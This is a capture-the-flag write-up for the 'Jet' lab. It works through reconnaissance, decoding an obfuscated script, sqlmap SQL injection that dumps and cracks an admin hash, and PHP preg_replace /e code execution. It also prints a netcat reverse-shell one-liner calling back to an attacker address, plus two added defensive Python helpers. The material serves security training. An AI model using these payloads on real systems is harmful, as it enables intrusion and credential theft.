Jet
Jet.com is currently looking for Security Engineers in the USA.
Jet’s mission is to become the smartest way to shop and save on pretty much anything. Combining a revolutionary pricing engine, a world-class technology and fulfillment platform, and incredible customer service, we’ve set out to create a new kind of e-commerce. At Jet, we’re passionate about empowering people to live and work brilliant.
We need super smart engineers from all levels to help us build one of the best engineered e-commerce platforms in the world (big talk we know, but that is our goal!). Our engineers combine creativity, curiosity, and drive to continuously perfect and revolutionize Jet from the inside out. We are looking to bring more intellectually curious engineers who are passionate about technology in general (Jet is a technology first company and prides itself on its culture of learning and knowledge sharing and we want all our engineers to be as passionate as we are!)
The Environment
Our infrastructure is largely built on Microsoft Windows. We have a hybrid configuration with on premise servers and cloud based servers using Microsoft Azure with a large number of additional technologies and middleware. We support three warehouses, a call center, corporate headquarters, and the development environment in the cloud. Our team uses a mix of Windows, Apple, and some Linux for our systems management platforms and cutting edge network equipment. About 50% of the development platform runs on Linux and the rest Windows.
ENTRY POINT
10.13.37.10
First of all
Nmap scan report for 10.13.37.10
Host is up (0.44s latency).
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
......
Open 10.13.37.10:22
Open 10.13.37.10:53
Open 10.13.37.10:80
Open 10.13.37.10:5555
Open 10.13.37.10:7777
Open 10.13.37.10:9201
Nmap scan report for 10.13.37.10
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:f6:49:80:81:cf:f0:07:0e:5a:ad:e9:8e:1f:2b:7c (RSA)
| 256 54:e2:7e:5a:1c:aa:9a:ab:65:ca:fa:39:28:bc:0a:43 (ECDSA)
|_ 256 93:bc:37:b7:e0:08:ce:2d:03:99:01:0a:a9:df:da:cd (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx on Debian!
|_http-server-header: nginx/1.10.3 (Ubuntu)
5555/tcp open freeciv?
| fingerprint-strings:
| DNSVersionBindReqTCP, GenericLines, GetRequest, adbConnect:
| enter your name:
| [31mMember manager!
| edit
| change name
| gift
| exit
| NULL:
| enter your name:
| SMBProgNeg:
| enter your name:
| [31mMember manager!
| edit
| change name
| gift
| exit
| invalid option!
| ......
7777/tcp open cbt?
| fingerprint-strings:
| Arucer, DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, Socks5, X11Probe:
| --==[[Spiritual Memo]]==--
| Create a memo
| Show memo
| Delete memo
| Can't you read mate?
| NULL:
| --==[[Spiritual Memo]]==--
| Create a memo
| Show memo
|_ Delete memo
9201/tcp open http BaseHTTPServer 0.3 (Python 2.7.12)
Introduction
Lift off with this introductory fortress from Jet! Featuring interesting web vectors and challenges, this fortress is perfect for those getting started.
Connect
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx on Debian!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx on Debian!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working on Debian. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a></p>
<p>
Please use the <tt>reportbug</tt> tool to report bugs in the
nginx package with Debian. However, check <a
href="http://bugs.debian.org/cgi-bin/pkgreport.cgi?ordering=normal;archive=0;src=nginx;repeatmerged=0">existing
bug reports</a> before reporting a new bug.
</p>
<p><em>Thank you for using debian and nginx.</em></p>
<b>JET{s4n1ty_ch3ck}</b>
</body>
</html>
JET{s4n1ty_ch3ck}
Digging in
First, try a reverse lookup of the target's own address through its DNS service:
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> @10.13.37.10 -x 10.13.37.10
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 15595
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;10.37.13.10.in-addr.arpa. IN PTR
;; AUTHORITY SECTION:
37.13.10.in-addr.arpa. 604800 IN SOA www.securewebinc.jet. securewebinc.jet. 3 604800 86400 2419200 604800
;; Query time: 283 msec
;; SERVER: 10.13.37.10#53(10.13.37.10) (UDP)
;; WHEN: Wed Mar 06 15:44:00 CST 2024
;; MSG SIZE rcvd: 109
Add the domain names to /etc/hosts:
10.13.37.10 www.securewebinc.jet
10.13.37.10 securewebinc.jet
Then visit the site:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>SecureWeb Inc. - We design secure websites</title>
......
<section id="contact">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading">Let's Get In Touch!</h2>
<hr class="my-4">
<p class="mb-5">Ready to start your next project with us? That's great! Give us a call and we will get back to you as soon as possible!</p>
</div>
</div>
<div class="row">
<div class="col-lg-4 ml-auto text-center">
<i class="fa fa-phone fa-3x mb-3 sr-contact"></i>
<p>123-456-6789</p>
</div>
<div class="col-lg-4 mr-auto text-center">
<i class="fa fa-flag-checkered fa-3x mb-3 sr-contact"></i>
<p>JET{w3lc0me_4nd_h@v3_fun!}</p>
</div>
</div>
</div>
</section>
......
</body>
</html>
JET{w3lc0me_4nd_h@v3_fun!}
Going Deeper
Visit the web page.
In the debugger of the browser's developer tools, a script is found: http://www.securewebinc.jet/js/secure.js
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,83,116,97,116,115,40,41,10,123,10,32,32,32,32,36,46,97,106,97,120,40,123,117,114,108,58,32,34,47,100,105,114,98,95,115,97,102,101,95,100,105,114,95,114,102,57,69,109,99,69,73,120,47,97,100,109,105,110,47,115,116,97,116,115,46,112,104,112,34,44,10,10,32,32,32,32,32,32,32,32,115,117,99,99,101,115,115,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,36,40,39,35,97,116,116,97,99,107,115,39,41,46,104,116,109,108,40,114,101,115,117,108,116,41,10,32,32,32,32,125,44,10,32,32,32,32,101,114,114,111,114,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,114,101,115,117,108,116,41,59,10,32,32,32,32,125,125,41,59,10,125,10,103,101,116,83,116,97,116,115,40,41,59,10,115,101,116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,32,103,101,116,83,116,97,116,115,40,41,59,32,125,44,32,49,48,48,48,48,41,59));
Decoding the ASCII codes in the script gives:
function getStats()
{
$.ajax({url: "/dirb_safe_dir_rf9EmcEIx/admin/stats.php",
success: function(result){
$('#attacks').html(result)
},
error: function(result){
console.log(result);
}});
}
getStats();
setInterval(function(){ getStats(); }, 10000);
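The decoding step above can be done without ever executing the script. The helper below is added here and is not part of the original writeup: it pulls the numeric argument list out of an `eval(String.fromCharCode(...))` wrapper, converts it back to text (repeating if the result is itself another wrapper) and lists the quoted server paths the decoded code talks to. The embedded sample is the leading portion of the page's js/secure.js, truncated after the URL.

```python
import re

# Numeric argument list of String.fromCharCode(...), as used by the
# obfuscated secure.js wrapper; tolerant of whitespace and newlines.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")

# Quoted absolute paths or URLs inside the decoded JavaScript.
PATH_RE = re.compile(r"""["'](/[^"'\s]*|https?://[^"'\s]+)["']""")


def decode_fromcharcode(blob: str, max_layers: int = 5) -> str:
    """Statically decode nested eval(String.fromCharCode(...)) layers.

    Nothing is evaluated: the code points are turned back into text with
    chr(), and the loop repeats while the result is itself another wrapper.
    Input without a wrapper is returned unchanged.
    """
    current = blob
    for _ in range(max_layers):
        match = FROMCHARCODE_RE.search(current)
        if not match:
            break
        codes = [int(n) for n in re.split(r"\s*,\s*", match.group(1).strip()) if n]
        current = "".join(chr(c) for c in codes)
    return current


def extract_paths(js_source: str) -> list[str]:
    """List the quoted server paths/URLs a decoded script references."""
    return sorted(set(PATH_RE.findall(js_source)))


# Leading portion of the page's js/secure.js (truncated after the URL).
SECURE_JS_SAMPLE = (
    "eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,83,"
    "116,97,116,115,40,41,10,123,10,32,32,32,32,36,46,97,106,97,120,40,123,117,"
    "114,108,58,32,34,47,100,105,114,98,95,115,97,102,101,95,100,105,114,95,114,"
    "102,57,69,109,99,69,73,120,47,97,100,109,105,110,47,115,116,97,116,115,46,"
    "112,104,112,34,44));"
)

if __name__ == "__main__":
    decoded = decode_fromcharcode(SECURE_JS_SAMPLE)
    print(decoded)
    print("endpoints:", extract_paths(decoded))
```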
Try requesting the stats.php endpoint:
1709711699
Try directory brute-forcing:
[15:56:33] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/auth.php -> login.php
[15:56:38] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/bower_components -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/bower_components/
[15:56:38] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/build -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/build/
[15:56:48] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/dashboard.php -> login.php
[15:56:49] 200 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/db.php
[15:56:51] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/dist -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dist/
[15:56:53] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/email.php -> login.php
[15:57:06] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/index.php -> login.php
[15:57:13] 200 - 3KB - /dirb_safe_dir_rf9EmcEIx/admin/login.php
[15:57:15] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/logout.php -> login.php
[15:57:35] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/plugins -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/plugins/
[15:57:59] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/uploads -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/uploads/
Visit /dirb_safe_dir_rf9EmcEIx/admin/login.php:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Secureweb Inc. | Log in</title>
<!-- Tell the browser to be responsive to screen width -->
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<!-- Bootstrap 3.3.7 -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/bootstrap/dist/css/bootstrap.min.css">
<!-- Font Awesome -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/font-awesome/css/font-awesome.min.css">
<!-- Ionicons -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/Ionicons/css/ionicons.min.css">
<!-- Theme style -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/dist/css/AdminLTE.min.css">
<!-- iCheck -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/plugins/iCheck/square/blue.css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="/dirb_safe_dir_rf9EmcEIx/admin/js/html5shiv.min.js"></script>
<script src="/dirb_safe_dir_rf9EmcEIx/admin/js/respond.min.js"></script>
<![endif]-->
</head>
<body class="hold-transition login-page">
<div class="login-box">
<div class="login-logo">
<b>Secureweb Inc.</b>
</div>
<!-- /.login-logo -->
<div class="login-box-body">
<p class="login-box-msg">
Authorized use only.
<br>
<span class="text-danger">
</span>
</p>
<!-- JET{s3cur3_js_w4s_not_s0_s3cur3_4ft3r4ll} -->
<form action="/dirb_safe_dir_rf9EmcEIx/admin/dologin.php" method="post">
<div class="form-group has-feedback">
<input name="username" type="username" class="form-control" placeholder="Username">
<span class="glyphicon glyphicon-envelope form-control-feedback"></span>
</div>
<div class="form-group has-feedback">
<input name="password" type="password" class="form-control" placeholder="Password">
<span class="glyphicon glyphicon-lock form-control-feedback"></span>
</div>
<div class="row">
<div class="col-xs-8">
<div class="checkbox icheck">
<label>
<input type="checkbox"> Remember Me
</label>
</div>
</div>
<!-- /.col -->
<div class="col-xs-4">
<button type="submit" class="btn btn-primary btn-block btn-flat">Sign In</button>
</div>
<!-- /.col -->
</div>
</form>
</div>
<!-- /.login-box-body -->
</div>
<!-- /.login-box -->
<!-- jQuery 3 -->
<script src="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap 3.3.7 -->
<script src="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- iCheck -->
<script src="/dirb_safe_dir_rf9EmcEIx/admin/plugins/iCheck/icheck.min.js"></script>
<script>
$(function () {
$('input').iCheck({
checkboxClass: 'icheckbox_square-blue',
radioClass: 'iradio_square-blue',
increaseArea: '20%' // optional
});
});
</script>
</body>
</html>
JET{s3cur3_js_w4s_not_s0_s3cur3_4ft3r4ll}
Bypassing Authentication
Probe the login page at http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/login.php for SQL injection:
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1327 HTTP(s) requests:
---
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=aqFD'||(SELECT 0x63754e76 WHERE 3730=3730 AND (SELECT 3989 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(3989=3989,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=aqFD'||(SELECT 0x4e5a4c63 WHERE 2250=2250 AND (SELECT 1236 FROM (SELECT(SLEEP(5)))bfpF))||'&password=
---
Extract the databases:
available databases [2]:
[*] information_schema
[*] jetadmin
Extract the tables in the database:
Database: jetadmin
[1 table]
+-------+
| users |
+-------+
Extract the data in the table:
Database: jetadmin
Table: users
[1 entry]
+----+------------------------------------------------------------------+----------+
| id | password | username |
+----+------------------------------------------------------------------+----------+
| 1 | 97114847aa12500d04c0ef3aa6ca1dfd8fca7f156eeb864ab9b0445b235d5084 | admin |
+----+------------------------------------------------------------------+----------+
Crack the hash with CrackStation:
| Hash | Type | Result |
|---|---|---|
| 97114847aa12500d04c0ef3aa6ca1dfd8fca7f156eeb864ab9b0445b235d5084 | sha256 | Hackthesystem200 |
This yields the credentials:
admin:Hackthesystem200
Logging into the system with the credentials above succeeds.
The flag can be found inside the system:
JET{sQl_1nj3ct1ons_4r3_fun!}
Command
Probing the interactive functions of the system, only the mail function turns out to be usable.
Test the data it transmits:
POST /dirb_safe_dir_rf9EmcEIx/admin/email.php HTTP/1.1
Host: www.securewebinc.jet
Content-Length: 332
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.securewebinc.jet
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8bqg9jk7kegf983s2of6v7i35
Connection: close
swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fi%5D=penis&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi%5D=bad+person&to=admin%40admin.com&subject=admin%40admin.com&message=%3Cp%3Eadmin%40admin.com%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1
Decode the POST data for analysis:
swearwords[/fuck/i]=make love
&swearwords[/shit/i]=poop
&swearwords[/ass/i]=behind
&swearwords[/dick/i]=penis
&swearwords[/whore/i]=escort
&swearwords[/asshole/i]=bad person
&to=admin@admin.com
&subject=admin@admin.com
&message=<p>admin@admin.com<br></p>
&_wysihtml5_mode=1
One can guess that the data is processed with the preg_replace function; try constructing an attack packet:
swearwords[/fuck/ie]=system('whoami')&swearwords[/shit/i]=poop&swearwords[/ass/i]=behind&swearwords[/dick/i]=penis&swearwords[/whore/i]=escort&swearwords[/asshole/i]=bad person&to=a@a.com&subject=test&message=swearwords[/fuck/]
The response is:
www-data
swearwords[/www-data/]
Try to get a reverse shell:
POST /dirb_safe_dir_rf9EmcEIx/admin/email.php?shell=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+10.10.16.2+9999+>/tmp/f HTTP/1.1
Host: www.securewebinc.jet
Content-Length: 233
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.securewebinc.jet
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8bqg9jk7kegf983s2of6v7i35
Connection: close
swearwords[/fuck/ie]=system($_GET["shell"])&swearwords[/shit/i]=poop&swearwords[/ass/i]=behind&swearwords[/dick/i]=penis&swearwords[/whore/i]=escort&swearwords[/asshole/i]=bad person&to=a@a.com&subject=test&message=swearwords[/fuck/]
The reverse shell connects back successfully:
┌─[randark@parrot]─[~]
└──╼ $ pwncat-cs -lp 9999
[17:23:16] Welcome to pwncat 🐈!
[17:31:24] received connection from 10.13.37.10:49936
[17:31:33] 10.13.37.10:49936: registered new host w/ db
(local) pwncat$ back
(remote) www-data@jet:/var/www/html/dirb_safe_dir_rf9EmcEIx/admin$ whoami
www-data
(remote) www-data@jet:/var/www/html/dirb_safe_dir_rf9EmcEIx/admin$ ls -lh
total 112K
-rw-r--r-- 1 root root 33 Dec 20 2017 a_flag_is_here.txt
-rwxr-x--- 1 root www-data 157 Jan 3 2018 auth.php
-rwxr-x--- 1 root www-data 39 Dec 20 2017 badwords.txt
drwxr-x--- 32 root www-data 4.0K Dec 20 2017 bower_components
drwxr-x--- 6 root www-data 4.0K Oct 9 2017 build
-rwxr-x--- 1 root www-data 82 Dec 20 2017 conf.php
-rwxr-x--- 1 root www-data 44K Dec 27 2017 dashboard.php
-rwxr-x--- 1 root www-data 600 Dec 20 2017 db.php
drwxr-x--- 5 root www-data 4.0K Oct 9 2017 dist
-rwxr-x--- 1 root www-data 820 Dec 27 2017 dologin.php
-rwxr-x--- 1 root www-data 2.9K Dec 27 2017 email.php
-rwxr-x--- 1 root www-data 43 Dec 20 2017 index.php
drwxr-x--- 2 root www-data 4.0K Dec 20 2017 js
-rwxr-x--- 1 root www-data 3.6K Dec 20 2017 login.php
-rwxr-x--- 1 root www-data 98 Dec 20 2017 logout.php
drwxr-x--- 10 root www-data 4.0K Dec 20 2017 plugins
-rwxr-x--- 1 root www-data 21 Nov 14 2017 stats.php
drwxrwxrwx 2 root www-data 4.0K Mar 3 13:38 uploads
JET{pr3g_r3pl4c3_g3ts_y0u_pwn3d}
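From the defender's side, the request bodies above are easy to recognise: a client should never be the one supplying the regex patterns a server hands to preg_replace, and the `e` modifier (which in PHP 5 made preg_replace run the replacement string through eval(), and which PHP 7 removed) is the tell. The checker below is added here and is not code from the writeup or from the target: it parses a form-encoded body and flags `swearwords[...]` keys whose pattern carries `e`. The two sample bodies are shortened versions of the normal form submission and the modified request quoted above.

```python
import re
from urllib.parse import parse_qsl

# Key shape the email.php form uses: swearwords[<pcre pattern>] = <replacement>
SWEARWORD_KEY_RE = re.compile(r"^swearwords\[(.*)\]$", re.S)

# PCRE pattern with a single-character delimiter: /body/modifiers
# (bracket-style delimiters such as (body) are not handled here).
PATTERN_RE = re.compile(r"^([^\w\s\\])(.*)\1([A-Za-z]*)$", re.S)


def user_supplied_patterns(body: str) -> list[tuple[str, str, str]]:
    """Return (key, pattern_body, modifiers) for every swearwords[...] field."""
    found = []
    for key, _value in parse_qsl(body, keep_blank_values=True):
        key_match = SWEARWORD_KEY_RE.match(key)
        if not key_match:
            continue
        pat = PATTERN_RE.match(key_match.group(1))
        if pat:
            found.append((key, pat.group(2), pat.group(3)))
        else:
            found.append((key, key_match.group(1), ""))
    return found


def dangerous_patterns(body: str) -> list[str]:
    """Keys whose client-supplied pattern carries the PCRE 'e' (eval) modifier.

    With PHP < 7, preg_replace under /e evaluates the replacement as PHP, so
    a client that controls both the pattern and the replacement controls code
    execution; this is the condition the writeup exploits.
    """
    return [key for key, _body, mods in user_supplied_patterns(body) if "e" in mods]


# Shortened from the two requests quoted in the writeup: the form's normal
# submission (URL-encoded) and the modified one carrying the /e modifier.
BENIGN_BODY = (
    "swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop"
    "&to=admin%40admin.com&subject=hi&message=%3Cp%3Ehello%3C%2Fp%3E"
)
ATTACK_BODY = (
    "swearwords[/fuck/ie]=system('whoami')&swearwords[/shit/i]=poop"
    "&to=a@a.com&subject=test&message=swearwords[/fuck/]"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("attack", ATTACK_BODY)):
        print(name, "->", dangerous_patterns(body) or "no /e modifier")
```

Any non-empty result from `user_supplied_patterns` is itself worth alerting on, since the fix is to keep the word list server-side rather than to filter modifiers.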